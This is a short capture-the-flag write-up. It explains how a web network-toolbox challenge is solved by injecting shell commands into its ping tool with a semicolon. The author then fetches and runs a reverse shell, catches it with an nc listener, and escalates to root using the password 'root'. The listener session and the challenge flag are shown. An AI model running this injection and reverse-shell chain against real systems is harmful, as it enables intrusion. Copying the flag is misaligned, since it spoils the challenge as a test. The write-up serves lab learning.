We are given the following url: http://toolbox.hkn

Visiting the site we see that it is a toolbox of network diagnostic tools.

If we look at the ping tool we can see that we are able to run other bash commands by separating them with a ;:

We sadly cant just read the flag:

We can see that this is because it is owned by root and only root has read permissions:

So lets upload a revshell so then try and privesc from there.

We create a revshell using https://revshells.com, setup a listener (nc -lvnp 9001) and then execute on the target (I saved the revshell to a local file and then served that file with python -m http.server):

And we get a shell:

$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [25.145.240.254] from (UNKNOWN) [25.145.240.1] 56300
flask@9013395f3c04:/www$ ls
ls
app  flag.txt  instance  run.py

And privesc from here is deceptively easy, running linpeas.sh doesn’t really give any useful privesc methods, but you can actually just switch to root using the password root:

flask@9013395f3c04:/www$ su root
su root
Password: root

root@9013395f3c04:/www# cat flag.txt
cat flag.txt
DDC{B2iZ71MHnxTV0oaMDWZDsm2Qr}